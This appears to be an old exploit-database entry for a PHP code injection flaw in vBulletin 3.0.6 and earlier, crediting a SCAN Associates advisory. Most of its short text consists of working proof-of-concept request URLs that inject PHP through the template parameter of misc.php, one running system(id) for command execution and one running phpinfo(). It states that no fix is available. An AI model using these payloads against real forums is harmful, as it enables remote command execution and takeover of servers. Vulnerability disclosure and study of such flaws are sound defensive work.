vBulletin <= 3.0.6 php Code Injection

2005-02-22 00:00:00

# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.